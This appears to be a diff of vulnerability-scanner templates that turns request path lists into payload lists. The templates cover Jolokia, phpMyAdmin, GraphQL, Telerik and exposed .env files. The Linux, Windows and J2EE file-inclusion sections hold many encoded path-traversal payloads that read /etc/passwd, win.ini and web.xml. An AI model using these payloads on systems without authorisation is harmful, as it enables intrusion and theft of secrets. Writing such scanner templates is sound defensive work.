-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
+        - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
+        - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
+        - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
+        - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
+        - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
+        - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
+        - "/actuator/jolokia/read/java.lang:type=Memory"
+        - "/jolokia/read/java.lang:type=Memory"
+        - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
+        - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
+        - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
+        - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
+        - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
+        - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
+        - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
 
     matchers-condition: or
     matchers:

http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml

@@ -16,16 +16,19 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/pma/server_import.php"
-      - "{{BaseURL}}/phpmyadmin/server_import.php"
-      - "{{BaseURL}}/phpMyAdmin 2/server_import.php"
-      - "{{BaseURL}}/db/server_import.php"
-      - "{{BaseURL}}/server_import.php"
-      - "{{BaseURL}}/PMA/server_import.php"
-      - "{{BaseURL}}/admin/server_import.php"
-      - "{{BaseURL}}/admin/pma/server_import.php"
-      - "{{BaseURL}}/phpMyAdmin/server_import.php"
-      - "{{BaseURL}}/admin/phpMyAdmin/server_import.php"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/pma/server_import.php"
+        - "/phpmyadmin/server_import.php"
+        - "/phpMyAdmin 2/server_import.php"
+        - "/db/server_import.php"
+        - "/server_import.php"
+        - "/PMA/server_import.php"
+        - "/admin/server_import.php"
+        - "/admin/pma/server_import.php"
+        - "/phpMyAdmin/server_import.php"
+        - "/admin/phpMyAdmin/server_import.php"
 
     stop-at-first-match: true
 

http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml

@@ -18,22 +18,25 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/phpmyadmin/scripts/setup.php"
-      - "{{BaseURL}}/phpMyAdmin/scripts/setup.php"
-      - "{{BaseURL}}/_phpmyadmin/scripts/setup.php"
-      - "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php"
-      - "{{BaseURL}}/php/phpmyadmin/scripts/setup.php"
-      - "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php"
-      - "{{BaseURL}}/web/phpmyadmin/scripts/setup.php"
-      - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
-      - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
-      - "{{BaseURL}}/phpmyadmin/setup/index.php"
-      - "{{BaseURL}}/pma/setup/index.php"
-      - "{{BaseURL}}/admin/pma/setup/index.php"
-      - "{{BaseURL}}/phpmyadmin/setup/"
-      - "{{BaseURL}}/setup/index.php"
-      - "{{BaseURL}}/admin/"
-      - "{{BaseURL}/phpMyAdminOLD/setup/index.php"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/phpmyadmin/scripts/setup.php"
+        - "/phpMyAdmin/scripts/setup.php"
+        - "/_phpmyadmin/scripts/setup.php"
+        - "/forum/phpmyadmin/scripts/setup.php"
+        - "/php/phpmyadmin/scripts/setup.php"
+        - "/typo3/phpmyadmin/scripts/setup.php"
+        - "/web/phpmyadmin/scripts/setup.php"
+        - "/xampp/phpmyadmin/scripts/setup.php"
+        - "/sysadmin/phpMyAdmin/scripts/setup.php"
+        - "/phpmyadmin/setup/index.php"
+        - "/pma/setup/index.php"
+        - "/admin/pma/setup/index.php"
+        - "/phpmyadmin/setup/"
+        - "/setup/index.php"
+        - "/admin/"
+        - "/phpMyAdminOLD/setup/index.php"
 
     stop-at-first-match: true
 

http/technologies/graphql-detect.yaml

@@ -10,131 +10,134 @@ info:
 
 http:
   - method: POST
+    payloads:
+      paths:
+        - "/HyperGraphQL"
+        - "/___graphql"
+        - "/altair"
+        - "/api/cask/graphql-playground"
+        - "/api/graphql"
+        - "/api/graphql/v1"
+        - "/explorer"
+        - "/express-graphql"
+        - "/gql"
+        - "/graph"
+        - "/graph_cms"
+        - "/graphiql"
+        - "/graphiql.css"
+        - "/graphiql.js"
+        - "/graphiql.min.css"
+        - "/graphiql.min.js"
+        - "/graphiql.php"
+        - "/graphiql/finland"
+        - "/graphql"
+        - "/graphql-console"
+        - "/graphql-devtools"
+        - "/graphql-explorer"
+        - "/graphql-playground"
+        - "/graphql-playground-html"
+        - "/graphql.php"
+        - "/graphql/console"
+        - "/graphql/graphql-playground"
+        - "/graphql/schema.json"
+        - "/graphql/schema.xml"
+        - "/graphql/schema.yaml"
+        - "/graphql/v1"
+        - "/je/graphql"
+        - "/laravel-graphql-playground"
+        - "/playground"
+        - "/portal-graphql"
+        - "/query"
+        - "/query-api"
+        - "/query-explorer"
+        - "/query-laravel"
+        - "/sphinx-graphiql"
+        - "/subscriptions"
+        - "/v1"
+        - "/v1/altair"
+        - "/v1/api/graphql"
+        - "/v1/explorer"
+        - "/v1/graph"
+        - "/v1/graphiql"
+        - "/v1/graphiql.css"
+        - "/v1/graphiql.js"
+        - "/v1/graphiql.min.css"
+        - "/v1/graphiql.min.js"
+        - "/v1/graphiql.php"
+        - "/v1/graphiql/finland"
+        - "/v1/graphql"
+        - "/v1/graphql-explorer"
+        - "/v1/graphql.php"
+        - "/v1/graphql/console"
+        - "/v1/graphql/schema.json"
+        - "/v1/graphql/schema.xml"
+        - "/v1/graphql/schema.yaml"
+        - "/v1/playground"
+        - "/v1/subscriptions"
+        - "/v2"
+        - "/v2/altair"
+        - "/v2/api/graphql"
+        - "/v2/explorer"
+        - "/v2/graph"
+        - "/v2/graphiql"
+        - "/v2/graphiql.css"
+        - "/v2/graphiql.js"
+        - "/v2/graphiql.min.css"
+        - "/v2/graphiql.min.js"
+        - "/v2/graphiql.php"
+        - "/v2/graphiql/finland"
+        - "/v2/graphql"
+        - "/v2/graphql-explorer"
+        - "/v2/graphql.php"
+        - "/v2/graphql/console"
+        - "/v2/graphql/schema.json"
+        - "/v2/graphql/schema.xml"
+        - "/v2/graphql/schema.yaml"
+        - "/v2/playground"
+        - "/v2/subscriptions"
+        - "/v3"
+        - "/v3/altair"
+        - "/v3/api/graphql"
+        - "/v3/explorer"
+        - "/v3/graph"
+        - "/v3/graphiql"
+        - "/v3/graphiql.css"
+        - "/v3/graphiql.js"
+        - "/v3/graphiql.min.css"
+        - "/v3/graphiql.min.js"
+        - "/v3/graphiql.php"
+        - "/v3/graphiql/finland"
+        - "/v3/graphql"
+        - "/v3/graphql-explorer"
+        - "/v3/graphql.php"
+        - "/v3/graphql/console"
+        - "/v3/graphql/schema.json"
+        - "/v3/graphql/schema.xml"
+        - "/v3/graphql/schema.yaml"
+        - "/v3/playground"
+        - "/v3/subscriptions"
+        - "/v4/altair"
+        - "/v4/api/graphql"
+        - "/v4/explorer"
+        - "/v4/graph"
+        - "/v4/graphiql"
+        - "/v4/graphiql.css"
+        - "/v4/graphiql.js"
+        - "/v4/graphiql.min.css"
+        - "/v4/graphiql.min.js"
+        - "/v4/graphiql.php"
+        - "/v4/graphiql/finland"
+        - "/v4/graphql"
+        - "/v4/graphql-explorer"
+        - "/v4/graphql.php"
+        - "/v4/graphql/console"
+        - "/v4/graphql/schema.json"
+        - "/v4/graphql/schema.xml"
+        - "/v4/graphql/schema.yaml"
+        - "/v4/playground"
+        - "/v4/subscriptions"
     path:
-      - "{{BaseURL}}/HyperGraphQL"
-      - "{{BaseURL}}/___graphql"
-      - "{{BaseURL}}/altair"
-      - "{{BaseURL}}/api/cask/graphql-playground"
-      - "{{BaseURL}}/api/graphql"
-      - "{{BaseURL}}/api/graphql/v1"
-      - "{{BaseURL}}/explorer"
-      - "{{BaseURL}}/express-graphql"
-      - "{{BaseURL}}/gql"
-      - "{{BaseURL}}/graph"
-      - "{{BaseURL}}/graph_cms"
-      - "{{BaseURL}}/graphiql"
-      - "{{BaseURL}}/graphiql.css"
-      - "{{BaseURL}}/graphiql.js"
-      - "{{BaseURL}}/graphiql.min.css"
-      - "{{BaseURL}}/graphiql.min.js"
-      - "{{BaseURL}}/graphiql.php"
-      - "{{BaseURL}}/graphiql/finland"
-      - "{{BaseURL}}/graphql"
-      - "{{BaseURL}}/graphql-console"
-      - "{{BaseURL}}/graphql-devtools"
-      - "{{BaseURL}}/graphql-explorer"
-      - "{{BaseURL}}/graphql-playground"
-      - "{{BaseURL}}/graphql-playground-html"
-      - "{{BaseURL}}/graphql.php"
-      - "{{BaseURL}}/graphql/console"
-      - "{{BaseURL}}/graphql/graphql-playground"
-      - "{{BaseURL}}/graphql/schema.json"
-      - "{{BaseURL}}/graphql/schema.xml"
-      - "{{BaseURL}}/graphql/schema.yaml"
-      - "{{BaseURL}}/graphql/v1"
-      - "{{BaseURL}}/je/graphql"
-      - "{{BaseURL}}/laravel-graphql-playground"
-      - "{{BaseURL}}/playground"
-      - "{{BaseURL}}/portal-graphql"
-      - "{{BaseURL}}/query"
-      - "{{BaseURL}}/query-api"
-      - "{{BaseURL}}/query-explorer"
-      - "{{BaseURL}}/query-laravel"
-      - "{{BaseURL}}/sphinx-graphiql"
-      - "{{BaseURL}}/subscriptions"
-      - "{{BaseURL}}/v1"
-      - "{{BaseURL}}/v1/altair"
-      - "{{BaseURL}}/v1/api/graphql"
-      - "{{BaseURL}}/v1/explorer"
-      - "{{BaseURL}}/v1/graph"
-      - "{{BaseURL}}/v1/graphiql"
-      - "{{BaseURL}}/v1/graphiql.css"
-      - "{{BaseURL}}/v1/graphiql.js"
-      - "{{BaseURL}}/v1/graphiql.min.css"
-      - "{{BaseURL}}/v1/graphiql.min.js"
-      - "{{BaseURL}}/v1/graphiql.php"
-      - "{{BaseURL}}/v1/graphiql/finland"
-      - "{{BaseURL}}/v1/graphql"
-      - "{{BaseURL}}/v1/graphql-explorer"
-      - "{{BaseURL}}/v1/graphql.php"
-      - "{{BaseURL}}/v1/graphql/console"
-      - "{{BaseURL}}/v1/graphql/schema.json"
-      - "{{BaseURL}}/v1/graphql/schema.xml"
-      - "{{BaseURL}}/v1/graphql/schema.yaml"
-      - "{{BaseURL}}/v1/playground"
-      - "{{BaseURL}}/v1/subscriptions"
-      - "{{BaseURL}}/v2"
-      - "{{BaseURL}}/v2/altair"
-      - "{{BaseURL}}/v2/api/graphql"
-      - "{{BaseURL}}/v2/explorer"
-      - "{{BaseURL}}/v2/graph"
-      - "{{BaseURL}}/v2/graphiql"
-      - "{{BaseURL}}/v2/graphiql.css"
-      - "{{BaseURL}}/v2/graphiql.js"
-      - "{{BaseURL}}/v2/graphiql.min.css"
-      - "{{BaseURL}}/v2/graphiql.min.js"
-      - "{{BaseURL}}/v2/graphiql.php"
-      - "{{BaseURL}}/v2/graphiql/finland"
-      - "{{BaseURL}}/v2/graphql"
-      - "{{BaseURL}}/v2/graphql-explorer"
-      - "{{BaseURL}}/v2/graphql.php"
-      - "{{BaseURL}}/v2/graphql/console"
-      - "{{BaseURL}}/v2/graphql/schema.json"
-      - "{{BaseURL}}/v2/graphql/schema.xml"
-      - "{{BaseURL}}/v2/graphql/schema.yaml"
-      - "{{BaseURL}}/v2/playground"
-      - "{{BaseURL}}/v2/subscriptions"
-      - "{{BaseURL}}/v3"
-      - "{{BaseURL}}/v3/altair"
-      - "{{BaseURL}}/v3/api/graphql"
-      - "{{BaseURL}}/v3/explorer"
-      - "{{BaseURL}}/v3/graph"
-      - "{{BaseURL}}/v3/graphiql"
-      - "{{BaseURL}}/v3/graphiql.css"
-      - "{{BaseURL}}/v3/graphiql.js"
-      - "{{BaseURL}}/v3/graphiql.min.css"
-      - "{{BaseURL}}/v3/graphiql.min.js"
-      - "{{BaseURL}}/v3/graphiql.php"
-      - "{{BaseURL}}/v3/graphiql/finland"
-      - "{{BaseURL}}/v3/graphql"
-      - "{{BaseURL}}/v3/graphql-explorer"
-      - "{{BaseURL}}/v3/graphql.php"
-      - "{{BaseURL}}/v3/graphql/console"
-      - "{{BaseURL}}/v3/graphql/schema.json"
-      - "{{BaseURL}}/v3/graphql/schema.xml"
-      - "{{BaseURL}}/v3/graphql/schema.yaml"
-      - "{{BaseURL}}/v3/playground"
-      - "{{BaseURL}}/v3/subscriptions"
-      - "{{BaseURL}}/v4/altair"
-      - "{{BaseURL}}/v4/api/graphql"
-      - "{{BaseURL}}/v4/explorer"
-      - "{{BaseURL}}/v4/graph"
-      - "{{BaseURL}}/v4/graphiql"
-      - "{{BaseURL}}/v4/graphiql.css"
-      - "{{BaseURL}}/v4/graphiql.js"
-      - "{{BaseURL}}/v4/graphiql.min.css"
-      - "{{BaseURL}}/v4/graphiql.min.js"
-      - "{{BaseURL}}/v4/graphiql.php"
-      - "{{BaseURL}}/v4/graphiql/finland"
-      - "{{BaseURL}}/v4/graphql"
-      - "{{BaseURL}}/v4/graphql-explorer"
-      - "{{BaseURL}}/v4/graphql.php"
-      - "{{BaseURL}}/v4/graphql/console"
-      - "{{BaseURL}}/v4/graphql/schema.json"
-      - "{{BaseURL}}/v4/graphql/schema.xml"
-      - "{{BaseURL}}/v4/graphql/schema.yaml"
-      - "{{BaseURL}}/v4/playground"
-      - "{{BaseURL}}/v4/subscriptions"
+      - "{{BaseURL}}{{paths}}"
 
     headers:
       Content-Type: application/json

http/technologies/telerik/telerik-dialoghandler-detect.yaml

@@ -15,23 +15,26 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1'
-      - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1'
-      - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
-      - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1'
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - '/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1'
+        - '/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1'
+        - '/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1'
+        - '/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
+        - '/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
+        - '/Telerik.Web.UI.DialogHandler.axd?dp=1'
 
     stop-at-first-match: true
 

http/vulnerabilities/generic/generic-env.yaml

@@ -17,28 +17,31 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/.env"
-      - "{{BaseURL}}/.env.bak"
-      - "{{BaseURL}}/.env.dev"
-      - "{{BaseURL}}/.env.dev.local"
-      - "{{BaseURL}}/.env.development.local"
-      - "{{BaseURL}}/.env.prod"
-      - "{{BaseURL}}/.env.prod.local"
-      - "{{BaseURL}}/.env.production"
-      - "{{BaseURL}}/.env.production.local"
-      - "{{BaseURL}}/.env.local"
-      - "{{BaseURL}}/.env.example"
-      - "{{BaseURL}}/.env.stage"
-      - "{{BaseURL}}/.env.live"
-      - "{{BaseURL}}/.env.backup"
-      - "{{BaseURL}}/.env.save"
-      - "{{BaseURL}}/.env.old"
-      - "{{BaseURL}}/.env.www"
-      - "{{BaseURL}}/.env_1"
-      - "{{BaseURL}}/.env_sample"
-      - "{{BaseURL}}/.env.{{DN}}"
-      - "{{BaseURL}}/.env.{{SD}}"
-      - "{{BaseURL}}/api/.env"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/.env"
+        - "/.env.bak"
+        - "/.env.dev"
+        - "/.env.dev.local"
+        - "/.env.development.local"
+        - "/.env.prod"
+        - "/.env.prod.local"
+        - "/.env.production"
+        - "/.env.production.local"
+        - "/.env.local"
+        - "/.env.example"
+        - "/.env.stage"
+        - "/.env.live"
+        - "/.env.backup"
+        - "/.env.save"
+        - "/.env.old"
+        - "/.env.www"
+        - "/.env_1"
+        - "/.env_sample"
+        - "/.env.{{DN}}"
+        - "/.env.{{SD}}"
+        - "/api/.env"
 
     matchers-condition: and
     matchers:

http/vulnerabilities/generic/generic-j2ee-lfi.yaml

@@ -17,19 +17,22 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/../../../../WEB-INF/web.xml"
-      - "{{BaseURL}}/../../../WEB-INF/web.xml"
-      - "{{BaseURL}}/../../WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
-      - "{{BaseURL}}/../../../WEB-INF/web.xml;x="
-      - "{{BaseURL}}/../../WEB-INF/web.xml;x="
-      - "{{BaseURL}}/../WEB-INF/web.xml;x="
-      - "{{BaseURL}}/WEB-INF/web.xml"
-      - "{{BaseURL}}/.//WEB-INF/web.xml"
-      - "{{BaseURL}}/../WEB-INF/web.xml"
-      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/../../../../WEB-INF/web.xml"
+        - "/../../../WEB-INF/web.xml"
+        - "/../../WEB-INF/web.xml"
+        - "/%c0%ae/%c0%ae/WEB-INF/web.xml"
+        - "/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
+        - "/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
+        - "/../../../WEB-INF/web.xml;x="
+        - "/../../WEB-INF/web.xml;x="
+        - "/../WEB-INF/web.xml;x="
+        - "/WEB-INF/web.xml"
+        - "/.//WEB-INF/web.xml"
+        - "/../WEB-INF/web.xml"
+        - "/%c0%ae/WEB-INF/web.xml"
 
     stop-at-first-match: true
 

http/vulnerabilities/generic/generic-linux-lfi.yaml

@@ -17,38 +17,41 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/etc/passwd"
-      - "{{BaseURL}}/..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
-      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
-      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
-      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
-      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
-      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
-      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
-      - "{{BaseURL}}/..///////..////..//////etc/passwd"
-      - "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
-      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
-      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
-      - "{{BaseURL}}/index.php?page=etc/passwd"
-      - "{{BaseURL}}/index.php?page=etc/passwd%00"
-      - "{{BaseURL}}/index.php?page=../../etc/passwd"
-      - "{{BaseURL}}/index.php?page=....//....//etc/passwd"
-      - "{{BaseURL}}/../../../../../../../../../etc/passwd"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/etc/passwd"
+        - "/..%5cetc/passwd"
+        - "/..%5c..%5cetc/passwd"
+        - "/..%5c..%5c..%5cetc/passwd"
+        - "/..%5c..%5c..%5c..%5cetc/passwd"
+        - "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
+        - "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+        - "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+        - "/static/..%5cetc/passwd"
+        - "/static/..%5c..%5cetc/passwd"
+        - "/static/..%5c..%5c..%5cetc/passwd"
+        - "/static/..%5c..%5c..%5c..%5cetc/passwd"
+        - "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
+        - "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+        - "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+        - "/./../../../../../../../../../../etc/passwd"
+        - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
+        - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
+        - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
+        - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
+        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+        - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
+        - "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+        - "/..///////..////..//////etc/passwd"
+        - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
+        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
+        - "/index.php?page=etc/passwd"
+        - "/index.php?page=etc/passwd%00"
+        - "/index.php?page=../../etc/passwd"
+        - "/index.php?page=....//....//etc/passwd"
+        - "/../../../../../../../../../etc/passwd"
 
     stop-at-first-match: true
     matchers:

http/vulnerabilities/generic/generic-windows-lfi.yaml

@@ -17,28 +17,31 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
-      - "{{BaseURL}}/./../../../../../../../../../../windows/win.ini"
-      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
-      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
-      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
-      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
-      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
-      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
-      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
-      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
-      - "{{BaseURL}}/..///////..////..//////windows/win.ini"
-      - "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini"
-      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
-      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00"
-      - "{{BaseURL}}/index.php?page=windows/win.ini"
-      - "{{BaseURL}}/index.php?page=windows/win.ini%00"
-      - "{{BaseURL}}/index.php?page=../../windows/win.ini"
-      - "{{BaseURL}}/index.php?page=....//....//windows/win.ini"
-      - "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini"
